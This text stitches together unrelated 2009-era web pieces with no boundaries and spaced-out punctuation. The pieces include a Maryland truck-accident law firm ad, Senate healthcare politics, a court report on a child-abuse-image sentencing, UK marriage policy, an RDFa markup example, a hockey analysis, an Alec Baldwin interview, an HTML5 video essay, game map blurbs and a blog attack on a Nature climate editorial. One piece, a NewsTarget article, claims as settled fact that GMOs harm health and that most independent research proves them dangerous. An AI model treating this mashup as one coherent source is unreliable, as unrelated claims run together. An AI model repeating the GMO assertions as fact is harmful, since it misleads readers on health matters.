Sometimes the trucking company is responsible for the trucking accident .
Companies that hire unlicensed drivers , force their drivers to work long hours resulting in driver fatigue or improperly train their drivers , can be held liable for the accident and resulting serious injuries .
Other common causes of truck accidents include :
Improper loading or overloading
Improper maintenance
Defective tires
Defective brakes
Other truck defects
Failure to comply with regulations for carrying hazardous materials
Lack of signage
Lack of guardrails or other highway “ hardware ”
Driving on unfamiliar roadways
No matter what caused the accident that injured you , our attorneys will conduct a thorough investigation to determine what happened and who is at fault .
We know the questions to ask and the evidence to gather .
You can rely on our law firm for effective representation that gets results in truck accident claims .
To schedule a free consultation , please contact us today .
Put our 50 years of combined experience to work for you .
From our office in Upper Marlboro and Annapolis , we represent injured people throughout Prince George ’s County , Anne Arundel County and in southern Maryland ( Baltimore , Bowie , Suitland - Silver Hill , Greenbelt , Waldorf , Saint Charles , Clinton , Parole , and Columbia ) .
If you can not come to us , we can arrange to meet you in Maryland or Virginia .
Sen. Joseph Lieberman ( I ) of Connecticut has emerged as perhaps the key player in the fate of healthcare reform legislation in the Senate – infuriating many Democrats , who accuse him of acting less out of a sense of principle than a desire to protect insurance companies , a key industry in his state .
But as Senator Lieberman and his fellow moderates push the Senate ’s massive health bill toward the right , the hard political fact is that it is liberals , not Lieberman , who may soon have to make a tough decision .
It now appears possible that the legislation might not include anything that resembles a public option – government - run insurance intended to compete with private firms .
If that ’s the case , will liberals vote for it anyway ?
After all , many Democrats on the more leftward side of the party have long insisted that the public option is something that a health bill absolutely , positively must have .
“ [ Senate majority leader ] Harry Reid is in just a terrible spot .
Do you go you with a bill that in effect offends the base ? ” says health insurance industry consultant Robert Laszewski .
For Democrats , the problem is that they need to get 60 votes to ensure a filibuster - proof majority for healthcare reform .
Their caucus – which includes Lieberman – numbers 60 senators .
While they might be able to attract a few Republicans , such as Sen. Olympia Snowe ( R ) of Maine , their margin for error is essentially nil .
Enter Joe.
Lieberman in essence seized control of the healthcare overhaul on Sunday by announcing his opposition to a plan to allow uninsured individuals as young as 55 to buy into Medicare .
The Medicare buy - in is a crucial part of a compromise intended to ease the concerns of moderates about the public option .
That compromise is now unravelling , as Lieberman made clear that he wo n't vote for anything that can be construed as government competition for private health firms .
“ It will add taxpayer costs .
It will add to the deficit .
It ’s unnecessary , ” Lieberman said of the Medicare buy - in option in a broadcast interview on Sunday .
The move has angered liberals , who point out that when Lieberman ran as Al Gore 's Democratic vice - presidential candidate in 2000 , he supported a buy - in proposal as part of the ticket 's health plan .
As recently as three months ago , Lieberman talked favorably of such a proposal in an interview with a Connecticut newspaper , according to a video of the interview circulating on the Web .
" My proposals were to basically expand the existing successful public health insurance programs Medicare and Medicaid , " Lieberman told The Connecticut Post .
Those comments made clear the Lieberman 's support for buy - in was in the past , said Lieberman spokesman Marshall Wittmann on Monday .
Today , the senator believes that the health insurance subsidies contained in the Senate bill render a buy - in program superfluous , said Mr. Wittmann .
" This would be a redundant program that would unnecessarily put the Medicare program in jeopardy , " the spokesman said .
The uproar only demonstrates how difficult it will be for Senator Reid to round up 60 votes for a bill that contains anything that smacks of public option competition for private firms .
Many liberals have said they wo n’t vote for a bill that does not have a public option .
In the end , would they really do that ?
“ I think they are going to do whatever the president asks them to do , ” says Mr. Laszewski , author of a popular healthcare blog .
If that ’s the case , they will likely vote to approve a bill .
President Obama has long said he believes the public option is the best means to keep pressure on insurance firms to control costs , but that it is also not the only means , and not an issue over which the bill should live or die .
Subscribe to our FREE daily newsletter for a round - up of the biggest stories from across Surrey Sign me up !
Thank you for subscribing
See our privacy notice Invalid Email
A TADWORTH grandfather whose 10 - year addiction to child porn ended with a police raid on his home has been spared a jail sentence .
William Newcomb , 73 , was handed a suspended prison sentence on Friday after pleading guilty to 14 offences of child pornography .
Guildford Crown Court heard that detectives discovered 765 indecent images of children .
One of the images was of an 18 - month - old baby , and many others were in the worst categories of child pornography , the court was told .
Newcomb , of Ballards Green , Tadworth , was arrested on March 18 this year and his computer was examined by police experts .
Ruby Selva , prosecuting , said 636 of the images were in category one , the least serious level of child pornography .
She said 15 were in category two , 47 in category three , 65 in category four , and two in category five , which is the most extreme level .
" One of the images was of a child only 18 - months - old .
Another was of two girls lying next to each other .
One had been tied up with rope , " she said .
Ms Selva said Newcomb had confessed to looking at indecent images since 1999 .
" He said he had been very naive and stupid .
But he said he had no sexual interest in children , " she said .
Larry Matthews , defending , told an earlier hearing that his client had two sons and three grandchildren .
" His family want him to get help , " he said .
Mr Matthews said Newcomb had become interested in pornography while caring for his seriously ill wife at home .
" He would find a custodial sentence very hard to cope with , " he added .
After reading probation and medical reports on the defendant , Judge Michael Addison sentenced him to a four - month jail term , suspended for two years , and put him under a two - year supervision order .
He also ordered him to be placed on the sex offenders ' register .
Judge Addison told Newcomb : " These photographs are of real children suffering real abuse .
People who misuse them encourage that trade . "
Marriage in Britain is in danger of becoming an exclusive middle - class institution unless action is taken to bolster it , David Willetts , the shadow cabinet member responsible for the family , says today .
Speaking to the Guardian , Willetts said it would be " extremely dangerous if marriage became something only for the affluent elite " and that the rate of family break - ups was a disaster for children .
The Conservatives are due to publish their ideas on the family in a discussion paper arguing the state and the voluntary sector can do more to help fathers in relationships , especially at the birth of the first child , frequently a point where couples drift apart and separate .
The party will also back recognition of marriage in the tax system , as well as providing relationship advice at civil marriage ceremonies .
The green paper will propose changes in the law to make it easier for grandparents and fathers to stay in contact with children when marriages break up .
Willetts insisted there was measurable evidence to show that married couples with children , as opposed to cohabiting couples , stayed together longer to the benefit of children .
" The aspiration of marriage is becoming harder to achieve .
Instead of it becoming just what you do in your 20s , it has become like scaling Mount Everest , a sort of great moral endeavour – and something that requires a lot of time and money .
We think we need to ease some of the pressures , " he said .
" There is quite a lot of evidence coming from America about how we are in danger of heading towards a society where middle - class people get married and people on low and erratic incomes do n't get married , and that in turn leads to a divergence of a whole host of other outcomes .
" In my view it would be extremely dangerous if marriage became something only for the affluent elite and that is what will happen , unless we try to get some kind of policy that restores it as a more widespread institution as we had in the past . "
Research from Essex University shows that less educated women born after 1960 have a divorce rate 30 % higher than that of the better educated .
They are also more likely to have a child outside a live - in partnership .
The figures and trends are even more pronounced in the US .
One explanation for the middle - class bias towards marriage in the US , Willetts said , was the fact that there were fewer eligible working - class males , owing to deskilling of societies .
He insisted that the Tories were not returning to a back - to - basics preaching agenda , and recognised that some marriages will fail .
Owing to budgetary pressures it was unlikely that recognition of marriage in the tax system would appear in the Tories ' first budget , but it was important to establish the principle , he said .
Recognition of marriage in the tax system would bring Britain back into the mainstream of European society , he argued .
" If you look at the analysis of the way in which most tax and benefit systems work , it looks as if the group that gets the raw deal in Britain compared with other advanced western countries is one - earner couples .
" That is the way in which the combined effect of our income tax and our tax credit work .
The second adult being invisible in the tax credit system is very odd indeed , " Willetts said .
Latest UK evidence shows marriage rates are at a historic low , with only 270,000 people married last year compared with 480,285 at the peak in 1972 .
Willetts defended his belief that marriage helped couples stay together to the benefit of the child , saying : " Any society in which something as massive as this institution of marriage with a deep history , with roots in its culture , with public recognition , where it did n't affect behaviour would be very odd indeed . "
He insisted : " I think there are things that have gone deeply wrong with our country .
The rate of family break - up is a disaster for children . "
Current evidence suggested that people divorced too readily , but Willetts admitted that his party could find no way to make divorce more difficult in law .
The green paper will propose home nurse visits for new families with greater emphasis on help for the father , and relationship guidance at the time of a civil marriage similar to that given by a vicar .
He would also like to spread the model of the Bristol community family trust that provides relationship courses to 30 % of new mothers in the city .
In cases of relationship breakdown , Willetts proposes that fathers should be given access to tax credits if they are looking after the child more frequently than the mother , and grandparents should be automatically considered for placements if both parents are not deemed suitable to bring up the children .
Grandparents should also be considered for access to the child following a divorce .
He said : " We do not think law custom or practice has kept up with the transformed role of grandparents . "
Surveys showed that one third of teenage girls say they can talk to their maternal grandmother about questions they would n't feel comfortable talking to their parents about .
He also proposed that children 's school reports should be sent to fathers as well as mothers in cases of breakdown .
" You do n't have to dress up in a Batman 's costume outside Buckingham Palace to think there are circumstances where law and practice lag way behind the reality . "
The green paper will say greater pressure is being placed on the family because of a decline in trust in other adults .
As an example of adding RDFa to a bibliographic reference , are there any improvements that could be made to this ?:
( the URIs are fictitious )
< ol xmlns:bibo= " http://purl.org/ontology/bibo/ " xmlns:dc= " http://purl.org/dc/elements/1.1/ " > < li about = " http://nature.com/doi/10.1038/ni.1758 " typeof=" bibo:AcademicArticle " > < a href = " http://nature.com/doi/10.1038/ni.1758 " property = " dc:title " xml:lang= " en " >
Mycobacterium tuberculosis evades macrophage defenses by inhibiting plasma membrane repair .</a> < br/> < a href = " http://crossref.org/contributor/a5f6ee " rel= " dc:creator " > Maziar Divangahi</ a> < i>et al. </i> < br/> < a href= " http://nature.com/issn/1234-5678 " rel= " dc:isPartOf " >< abbr property = " dc:title " content = " Nature Immunology " > Nat. Immunol .</abbr></a> < span property =" bibo:volume "
>10</ span > , < span property =" bibo:pageStart " >899</span > - < span property=" bibo:pageEnd " >906</span > ( < span property = " dc:date " content = " 2009-06-01 " >2009</span > ) < br/> DOI : < span property =" bibo:doi " >10.1038/ni.1758</span > </li > </ol >
When embedded in an XHTML page it seems to validate , and the right things get extracted when the HTML is put into the RDFa fragment parser .
Thanks to Bruce D'Arcus for an example to base this on .
About the author
( NewsTarget ) According to a recent report compiled from U.S. Department of Agriculture ( USDA ) data , the growing of genetically engineered crops has led to a 383 million pound increase in U.S. pesticide use during the time period spanning from 1996 to 2008 .
The Organic Center ( TOC ) , the Union for Concerned Scientists ( UCS ) , and the Center for Food Safety ( CFS ) jointly released the report that illustrates the environmental hazards posed by the farming of GMO crops .
Since their initial unveiling , GMOs have been touted by the agricultural biotechnology industry as the discovery that will end world hunger and improve the environment .
Nothing could be further from the truth .
Among their many other negative consequences , " herbicide - tolerant " ( HT ) GMO crops have resulted in new herbicide - resistant weeds that are sprouting up in farmers ' fields .
When farmers respond by increasing pesticide use , ever - stronger " superweeds " continue to appear .
GMO seeds are significantly more expensive than natural seeds and have been continuing to climb in price over the years .
Big AgriBio defends the higher costs by suggesting the farmer benefit from not having to use as much pesticide on GMO crops .
The reality is that farmers are using much more pesticide in order to fight superweeds .
Glyphosate , the active ingredient in Monsanto 's RoundUp herbicide , is no longer effective at treating the weeds that result from the planting of " RoundUp - ready " crops .
Thus millions of acres of farmland are now plagued by superweeds that are destroying the environment , ruining crops , and ultimately ruining farmers ' businesses .
All industry promises of increased yields , decreased pesticide use , and cures for world hunger have proven to be entirely bogus .
Not one claim made by the biotechnology industry concerning the benefits of GMOs has proven true .
Independent scientific reports continue to show that industry assertions in favor of GMOs are patently false .
Pesticide residue in foods that contain GMO ingredients is also significant .
Such pesticides are linked to reproductive abnormalities , neurological disorders , birth defects , and other bodily harm .
GMOs themselves are also implicated in a host of bodily disorders including digestive problems and the perpetuation of GMO fragments in the body .
No long - term studies have ever verified the safety of GMOs and most independent research proves them to be dangerous in a number of different ways .
Americans must step up and demand mandatory labeling of products that contain GMO ingredients .
If more people realized the extent to which GMOs have contaminated the food supply , the demand for GMO - free foods would greatly increase .
Growers , producers , and retailers would surely take notice and the market would correct the problem by providing wholesome , organic options that are free of toxic GMO contaminants .
Transparency in labeling would do much to curb the use of GMOs .
Sources : Ethan
Huff is a freelance writer and health enthusiast who loves exploring the vast world of natural foods and health , digging deep to get to the truth .
He runs an online health publication of his own at http://wholesomeherald.blogspot.com
UK RESIDENTS outraged by plans to cull some 6000 camels are warning other Europeans against visiting Australia .
Online discussion forums , which describe Australia as a Third World country , have been running hot since it was revealed last week that residents in a small central Australian community were being held hostage by a herd of thirsty , marauding camels .
The Northern Territory government announced last week it would conduct an emergency cull of some 6000 feral camels at a cost of $ 49,000 .
NT Local Government Minister Rob Knight has since received hate mail from around the world .
Docker River , 500 km south west of Alice Springs , has been inundated by thousands of wild camels in recent weeks .
As well as smashing water infrastructure in their hunt for moisture , the quality of drinking water in the town is being threatened by the decaying bodies of camels that have been trampled by their herd .
The UK Times Online last week posted a story about the camel siege , which prompted an influx of public comment .
One blogger suggested spending the $ 49,000 to build a water hole for the camels , rather than herding them out of town by helicopter to slaughter them .
" The animals that live here alongside us deserve respect and if we can help them live , what is so wrong with that ? " K Jordon wrote .
Many comments state that Australia is not worthy of G20 status , while others claim Australians have a chip on their shoulder .
" Please tell all your friends that Australia is the worst nation on earth and they should stay away , " William Burt wrote .
" Yet further evidence , if any were needed , that Australia is a Third World country with a standard of living markedly below even the worst in Europe , " John Spurway said .
One person from Germany wrote to Mr Knight last week , saying he was " outraged and shocked " by the government 's plan .
" So 6000 innocent , gentle creatures have to die for only 350 humans ? " he wrote .
" To me , these creatures have the same right to live under God 's sun and drink his water as any other , including the human species . "
The comments mirrored similar attacks made on US television earlier this year , calling Prime Minister Kevin Rudd a " serial killer " for culling camels in remote Australia .
The talk show host called the cull " genocide " and used a stuffed camel toy to demonstrate how the animals would be killed .
Despite the backlash , not all correspondence to Mr Knight has been critical of the decision to cull .
One man from Tanzania said he was an " avid large game hunter " .
" I would be more than happy to volunteer my time and knowledge for the culling effort to assist your area , " he wrote .
There are about one million feral camels throughout Australia , with numbers doubling every eight or nine years .
The 2005 - 06 season was a season that saw the Sabres one game from their second Stanley Cup Final appearance in eight years .
During that offseason , the team identity started to change with players like Mike Grier and J.P. Dumont leaving the team .
While leaving , Grier stated that he did like the direction of the organization and that it was time to jump ship .
Fast forward three years to this offseason and that same player has since returned to the organization that sent him to his last Conference Final .
Mike Grier 's presence on this team along with other additions have added a sense of physicality that has been missing and a veteran presence that was sorely lacking .
With Grier having injuries and personal issues seeing him miss nine games this season , the Sabres seem to have a different style of play with him out of the lineup .
While their 5 - 3 - 1 record with Grier out of the lineup may show that he is not a factor , the stats show that his presence in the lineup makes a difference to how this team plays defensively .
Grier 's main strength is that he is a good defensive forward .
This season , the team is third in total goals against / game with 2.17 goals / against .
In the nine games that Grier has missed this season , the Sabres have given up 22 goals or 2.44 goals / game as compared to the 2.05 goals / game with him in the lineup , a difference of roughly .3 goals / game .
In terms of shots allowed , the Sabres allowed 283 shots when Grier was out of the lineup , 31.4 shots / game , while allowing 631 with him in the lineup , 30.04 shots / game for a difference of 1.36 shots / game .
While these differences are not statistically mind blowing , they do show that Grier makes this a better defensive team .
Grier 's offensive abilities are also missing when he is out of the lineup .
In Grier 's absence this season , the Sabres have scored 19 goals , or 2.11 goals / game .
With Grier in the lineup , that jumps to 2.85 goals / game .
Grier himself has scored five goals on the season which has him tied for ninth on the team with Patrick Kaleta .
In terms of shots on goal , the difference is 29.77 shots / game without Grier compared to 33.04 shots / game with him in the lineup .
Mike Grier is never going to be a 50 goal scorer or a 100 point player , but the offensive and defensive skills he brings to this team makes the Sabres that much better .
With all that being said , the return of Mike Grier to the lineup tonight is a sight the team is happy to see .
How To FailScrew ups , disasters , misfires , flops .
Why losing big can be a winning strategy .
Accept Defeat : The Neuroscience of Screwing UpStay in the Game : The Fall and Rise of Alec BaldwinLearn to Let Go : How Success Killed Duke NukemTime Your Attack : Oracle 's Lost RevolutionMy Greatest Mistake : Learn From Six LuminariesAccidental Art : Three Alternate Histories Celebrities tend to be endlessly , tediously positive : Every day is a Gift , every project a Personal Best , and every costar a Genius .
Alec Baldwin is not afflicted with this syndrome .
At 51 , he 's a failure , self - described .
He 's also at the peak of his career , a peak he reached by scaling a K2 of catastrophe , personal and professional .
You see , two decades of relentless mistakes have earned him multiple Emmys , Tony and Oscar nominations , and a much - anticipated gig cohosting the Academy Awards with Steve Martin — a lifetime of stutter - stop achievement Baldwin calls " all this other bullshit . "
None of it mitigates his sense of having fallen short of triumph .
But the star of 30 Rock ( and the new rom- com It 's Complicated with Meryl Streep ) is OK with that .
In fact , he 's thrilled .
That 's because each Baldwin Fail — beginning in 1991 with the loss of the Jack Ryan franchise to Harrison Ford , which sank a promising career as a leading man — seems to have spurred a Baldwin Save .
In that spirit , Baldwin ushers Wired through his greatest flops , leading by example on how to fail , fail again , and fail better next time .
The Fail
My entire film career .
I made films from about ' 86 until ' 99 .
And then things started to really wind down .
When your fortunes ebb in the movie business , it 's like The Sixth Sense :
You 're dead and you do n't know it .
The Save
My television career .
30 Rock does n't have the biggest audience , but we have an audience .
And my God , what a difference it makes .
I walk down the street all day long and people tell me how much they love the show .
Not that I need to wake up every day and have every bird in the trees and every horse riding along the bridle path wink at me and say , " Oh , Alec , I loved 30 Rock last night ! "
But it 's nice .
The Fail
Mercenary acting .
I needed to make a living .
People do n't realize actors are like plumbers .
When you invite a plumber to your house and say , " I want you to put this sink in my bathroom , " the plumber does n't say , " I 'm not going to install that sink , it 's hideous .
You have the worst taste in sinks ! "
No , he just says , " OK , " and he puts it in .
The Save
Making a terrible romantic comedy .
My Best Friend 's Girl had one of the worst scripts I 've ever read in my life .
The movie was a huge disaster .
Scathing reviews .
And I realized : I 'm done with doing it for the money .
The Fail
My personal life .
I mean , I 'm divorced .
I was married to someone [ actress Kim Basinger ] .
I got very Zen about it .
It does n't really matter who 's to blame .
But in many ways my marriage mirrors my experience in the film business .
I think to myself , How many years do I have left ?
What 's out there that I want to enjoy ?
The Save
A very productive midlife crisis .
I had the realization : God , I 'm 51 years old and I spent 30 years of my life doing things I did n't want to do .
The things you do to please other people !
I said to myself , Well now I 'm just going to have a good time .
That was the most freeing thing .
For the first time , I wanted to do whatever I felt like that day .
I wrote a book , A Promise to Ourselves , this critique of the family law system .
I want to write more books .
I want to go back to school .
I might even run for public office .
The Fail
A run for public office .
I will try to sell the American public on this idea : Sacrifice more !
Make do with less !
For the good of the country !
I 'll run for office , and I 'll go out there and bomb .
The ( Likely ) Save
Another sitcom .
Another sitcom .
Probably a sidekick role on Jack McBrayer 's Kenneth spinoff .
We 're all going to be working for the 30 Rock page .
The Alec Baldwin Career Graph
Overcoming failure again and again and again ...
Grooming by Richard Esposito and Stacey Panepinto ; set design by Andy Harman / Wall Group ; Interviewed at Public in the Monday room in New York City
Why the HTML5 ‘ Video ’ Element Is Effectively Unusable , Even in Browsers Which Support It
[ Update , 22 Dec 2009 :
In the original version of this article , I incorrectly reported that Firefox auto - buffers HTML5 video content by default , as Safari and Chrome do .
It does not , as shown by Christopher Blizzard ’s simple tests here .
I regret the error , and have revised the article accordingly .
For posterity , the source for the original version is preserved here .
You can create a precise list of changes by doing a diff against the source for the current revision . ]
I seldom post video to DF , but when I do , I refuse to embed Flash , 1 I want the markup to be sane and standard , I want the video to play in popular standards - compliant web browsers , and I do n’t want the video to download / buffer automatically .
Here ’s an example from a year ago , using QuickTime .
What you see upon page load is a poster frame ( a still image ) , then you ( the user ) click the poster frame to actually download and watch the video .
Here ’s the markup I used then :
< embed width = " 320 " height = " 256 " type =" video/ quicktime " pluginspage = "
http://www.apple.com/quicktime/download/ " src=" dtk-panic-1-poster.jpg " href = " dtk- panic -1.mov " target = " myself " controller = " false " autoplay = " false " scale = " aspect " />
That markup met all of my aforementioned desires but for one : the < embed > tag is not standard .
Worse , it now has a new significant problem : it does n’t work at all in Chrome ( at least on the Mac ) .
So I ’ve been paying attention to the new < video > element in HTML5 .
In a nut , it attempts to make embedding a video in a web page just as easy markup - wise as embedding an image with the < img > tag .
( Likewise for audio with the new < audio > element . )
The obvious downside to relying solely on the < video > element to embed web video is that because it ’s new , the only browsers that support it are recent releases of Safari , Firefox , and Chrome .
This is n’t one of those things that just does n’t work in IE6 or IE7 — it does n’t work in IE period .
Therefore few sites are using HTML5 video in production now , and of those , nearly all are doing so with fallback markup , often of significant complexity , that presents the video using a Flash player for other browsers .
Because ( a) I do n’t post much video ; ( b ) the overwhelming majority of DF ’s audience is in fact using an HTML5 - compatible version of Safari , Firefox , or Chrome ; 2 and ( c ) I ’m willing to be a dick about this ; I do not care about fallbacks for browsers that do n’t support < video > .
What I ’d like to do is just use < video > , with two source elements — MP4 and OGV — for all the cross - browser reasons specified in Mark Pilgrim ’s fine chapter on video in his in - progress HTML5 book .
( Short version : Safari and MobileSafari support only MP4 , Firefox supports only OGV , Chrome supports both MP4 and OGV . )
3
So I decided to try this last week with the screencast videos I created to illustrate my piece on Pastry Kit .
I tried markup like this :
< video height = " 475 " width = " 407 " controls poster= " iphoneguide-mac.png " > < source src=" iphoneguide-mac.mp4 " type=" video/mp4 " /> < source src=" iphoneguide-mac.ogv " type=" video/ogg " /> </ video>
The good news :
The above markup results in video that plays in Safari , Chrome , and Firefox .
It also works perfectly in MobileSafari on iPhone OS .
Safari and Chrome play the MP4 video , Firefox plays the OGV .
( Chrome supports both formats , and plays the one listed first .
I want it to play the MP4 version because the video and audio are of noticeably superior quality . )
That is the entirety of the necessary markup ; if you ’re unfamiliar with the sort of nasty markup typically used to embed video , try a little View Source on a few web pages that embed video .
The bad news :
In two of the three browsers ( Safari 4.0.4 and Chrome 4.0.249.43 ) , with the above simple markup , the video content buffers automatically on page load .
What I mean is that as soon as you load the web page , the browsers download the actual video files that are embedded .
As stated at the outset , I do n’t want that .
Instead , on page load , I want the browser to render only the poster image , and load the video only after the user has clicked to initiate playback .
The HTML5 spec defines an autobuffer attribute for the video and other media elements ( bold emphasis added ) :
The autobuffer attribute is a boolean attribute .
Its presence hints to the user agent that the author believes that the media element will likely be used , even though the element does not have an autoplay attribute .
( The attribute has no effect if used in conjunction with the autoplay attribute , though including both is not an error . )
This attribute may be ignored altogether .
Firefox honors the autobuffer attribute .
Omit the attribute from your markup , and video content will not auto - buffer in Firefox .
Include it , and it will .
But alas , in my testing , Safari and Chrome take the spec up on the aforebolded offer to ignore this attribute .
Even if you do not explicitly turn this attribute on , Safari and Chrome will still auto - buffer the content for your < video > ( and < audio > ) elements .
There is no way to suppress this using HTML markup .
You might be thinking , “ Hey , but default auto - buffering sounds like a good feature , because that way users wo n’t have to wait as long for the video to be ready to play . ”
I presume this sort of thinking is what led the Safari and Chrome teams to do this .
But this browser behavior is very much undesirable for both publishers and users in common contexts .
Users loading the page over a slow connection , or a pay - by - the - megabyte metered connection ( which is common with wireless networks ) , should not be forced to download a potentially large video every time they load the page .
Likewise , publishers should not be forced to pay for the bandwidth to transmit videos that wo n’t be watched .
Think , in particular , of the nature of publishing embedded video on a weblog .
I , the publisher , post an entry containing embedded video .
That post may remain on my home page for a week .
Regular readers may load the home page dozens of times during the period when the video appears on the page .
With auto - buffering , they ’re going to download the full video every time they load the page .
Local caching may alleviate some of that , but for sites with high traffic and / or which frequently embed video , the difference is enormous .
This is why embedded video from YouTube , Vimeo , and all similar services works on a click - to - load basis .
Auto - buffering is fine as an optional attribute , but for many ( probably most ) contexts , click - to - load is essential behavior .
But as far as I can see , there ’s no way to get click - to - load video in Safari or Chrome using just a < video > element .
The only workaround I could think of was to do something like this :
In the HTML markup , rather than a < video > element , instead use an < img > element with the intended poster frame .
Add an onclick JavaScript handler to the < img > element , which , when invoked , does some DOM jiggery - pokery to remove the just - clicked - upon < img > element and replace it with a < video > element that sources the intended video files .
And , in fact , that is exactly what I resorted to for my Pastry Kit videos .
Do a View Source on that page to see the solution .
There goes the nice clean just - as - easy - to - include - a - video - as - an - image markup .
( My sincere thanks to Faruk Ateş and Paul Irish for helping with the jiggery - pokery implementation . )
This WebKit bug filed back in April indicates I ’m not the first person to stumble on this shortcoming .
That ’s about < audio > instead of < video > , but the principle is exactly the same .
And the example cited in this bug report seems like a perfect scenario where everyone should agree that media content should not buffer automatically : a podcast archive page with an < audio > element for every previous episode .
A big part of the appeal of the < video > and < audio > elements is that they should be easier to use .
As it stands today , though , these elements are unusable in popular contexts without resorting to JavaScript DOM manipulation to effectively turn auto - buffering off .
Cp_gorge is a top secret alpine facility diabolically masquerading as something else entirely : in this case , a sinister weapons factory disguised as an innocent water purification plant , and a large - ish hole not big enough to meet the U.S. Geological Survey ’s standards for a gorge , disguised as a by - the - book , nothing - to - see - here gorge .
Cp_gorge is an attack / defense map with only two control points , designed for quick rounds and fast , frantic play .
It has more lateral game space than previous Control Point maps , allowing for more maneuvering options .
In the middle of the night , two bridges span a bottomless chasm of certain doom .
( Said bridges span the chasm in the day also , but the gate is locked . )
Secret bases concealed behind the unassuming facades of a factory and a farm built next door to each other fool absolutely no one in the area , who sometimes gather around to “ watch all them mercenaries fight over that spy base . ”
Doublecross is a fast - paced map that promises a lot of turnaround , with fighting focused on the main bridge and plenty of ways to fall off of it ( or cause others to ) .
The secondary train bridge below is perfect for sneakier classes , and provides a number of secret tunnels .
It is really too bad that I do n’t have a subscription .
I ’m a bit late to commenting on this editorial that appeared in Nature magazine yesterday , but I feel it is important to say a few things about it , even though many WUWT readers have probably already seen the editorial .
1 . For a scientific journal to use the label “ denialists ” is in my opinion unconscionable , and highlight ’s Nature ’s own bias .
For the record , while there may in fact be a few people who deny any warming has occurred in the past 100 years ( it has ) the real issue is the cause .
That is what skeptics are about .
There are many academics and researchers that have questions about what is being presented in the mainstream climate science today .
To put the full weight of Nature behind a broad brush labeling them as “ deniers ” or “ denialists ” is a huge mistake .
The scientific integrity of one of the foremost scientific magazines has been tarnished by the use of a cheap slur .
2 . The claims of harassment are ludicrous .
The very foundation of science is based on the ability of other scientists to perform replication via data sharing .
Finding excuses to not do this , and actively setting up hurdles to those requesting data for replication is not only not part of the scientific method , it is obstruction of the method .
Had the files been provide in early FOI requests , no escalation of requests would have happened .
CRU brought this on themselves , mainly due to the stubborn refusal of Dr. Jones to allow data for replication purposes .
Besides , UAE has a person specifically assigned to handling FOIA requests .
Jones had the data to fill the requests , all he had to do is hand them to the FOIA officer .
He chose not to , further in one of the emails it was revealed that Jones and his staff lobbied that FOIA officer not to honor these requests .
My hunch is that is where this row started .
3. For Nature to claim that :
Researchers are barred from publicly releasing meteorological data from many countries owing to contractual restrictions .
Moreover , in countries such as Germany , France and the United Kingdom , the national meteorological services will provide data sets only when researchers specifically request them , and only after a significant delay .
Is pure rubbish .
See point 5 below also – they provided the data to Peter Webster .
The majority of weather stations that report data used in the CRU are from public airports worldwide .
Here is a list of stations that was grudgingly provided by Phil Jones after years of effort , and it was delivered broken .
McIntyre had to fix it .
See the cru_station_info file .
Pick a few stations in France , Germany , and United Kingdom , then go to weatherunderground.com and see if they are available as hourly reports , or check many of the publicly available climate data sistes
It is public data .
Yet CRU claims it is proprietary and protected by agreements and we ca n’t see the data they are using ?.
Something is wrong there .
I picked three from the countries listed at random from the cru station info file :
GERMANY HOHENPEISSENBERG
See http://www.tutiempo.net/en/Climate/HOHENPEISSENBERG/109620.htm
FRANCE BOURGES
See : http://www.tutiempo.net/en/Climate/Bourges/72550.htm
UK WADDINGTON See : http://www.tutiempo.net/en/Climate/Waddington/33770.htm
Anybody with a PC and Internet connection can get some of the data CRU uses that is claimed proprietary , so why the need for protectionism when a researcher asks for data from the same locations collated as used in CRU processes ?
4 . Nature assumes it was a hack in , but the evidence points to a leak , or even a carelessly left file on a public FTP site at CRU ( which has happened before )
Hackers are usually smash and grab affairs , with little time for understanding of what they are grabbing since they do n’t know how long it willbe before they are discovered .
They ’ll sort it out later .
The FOIA2009.zip appears to have been carefully assembled , pointing to someone with specific knowledge and broad access across systems .
Further , hackers usually tout their exploits as “ badges of honr ” .
We ’ve heard nothing .
5 . Previously , Nature reported on Steve McIntyre ’s attempts to get access to this data in their report on August 12th , 2009 without so much as a disparaging word against Mr. McIntyre .
They wrote then :
McIntyre is especially aggrieved that Peter Webster , a hurricane expert at the Georgia Institute of Technology in Atlanta , was recently provided with data that had been refused to him .
Webster says his team was given the station data for a very specific request that will result in a joint publication with Jones .
“ Reasonable requests should be fulfilled because making data available advances science , ” says Webster , “ but it has to be an authentic request because otherwise you ’d be swamped . ”
Yet today , they drag out the slur denialist over the very same issue : data access and replication .
If replication is not a valid request , then climate science is doomed .
Yes , I ’d cancel my Nature subscription if I had one .
– Anthony
Here is the Nature editorial as posted here : http://www.nature.com/nature/journal/v462/n7273/full/462545a.html
Editorial
Nature 462 , 545 ( 3 December 2009 ) | doi :10.1038/462545a ; Published online 2 December 2009
Climatologists under pressure
Abstract Stolen e-mails have revealed no scientific conspiracy , but do highlight ways in which climate researchers could be better supported in the face of public scrutiny .
The e-mail archives stolen last month from the Climatic Research Unit at the University of East Anglia ( UEA ) , UK , have been greeted by the climate - change - denialist fringe as a propaganda windfall ( see page 551 ) .
To these denialists , the scientists ’ scathing remarks about certain controversial palaeoclimate reconstructions qualify as the proverbial ‘ smoking gun ’ : proof that mainstream climate researchers have systematically conspired to suppress evidence contradicting their doctrine that humans are warming the globe .
This paranoid interpretation would be laughable were it not for the fact that obstructionist politicians in the US Senate will probably use it next year as an excuse to stiffen their opposition to the country ’s much needed climate bill .
Nothing in the e-mails undermines the scientific case that global warming is real — or that human activities are almost certainly the cause .
That case is supported by multiple , robust lines of evidence , including several that are completely independent of the climate reconstructions debated in the e-mails .
First , Earth ’s cryosphere is changing as one would expect in a warming climate .
These changes include glacier retreat , thinning and areal reduction of Arctic sea ice , reductions in permafrost and accelerated loss of mass from the Greenland and Antarctic ice sheets .
Second , the global sea level is rising .
The rise is caused in part by water pouring in from melting glaciers and ice sheets , but also by thermal expansion as the oceans warm .
Third , decades of biological data on blooming dates and the like suggest that spring is arriving earlier each year .
Denialists often maintain that these changes are just a symptom of natural climate variability .
But when climate modellers test this assertion by running their simulations with greenhouse gases such as carbon dioxide held fixed , the results bear little resemblance to the observed warming .
The strong implication is that increased greenhouse - gas emissions have played an important part in recent warming , meaning that curbing the world ’s voracious appetite for carbon is essential ( see pages 568 and 570 ) .
Mail trail A fair reading of the e-mails reveals nothing to support the denialists ’ conspiracy theories .
In one of the more controversial exchanges , UEA scientists sharply criticized the quality of two papers that question the uniqueness of recent global warming ( S. McIntyre and R. McKitrick Energy Environ .
14 , 751–771 ; 2003 and W. Soon and S. Baliunas Clim. Res. 23 , 89 –110 ; 2003 ) and vowed to keep at least the first paper out of the upcoming Fourth Assessment Report of the Intergovernmental Panel on Climate Change ( IPCC ) .
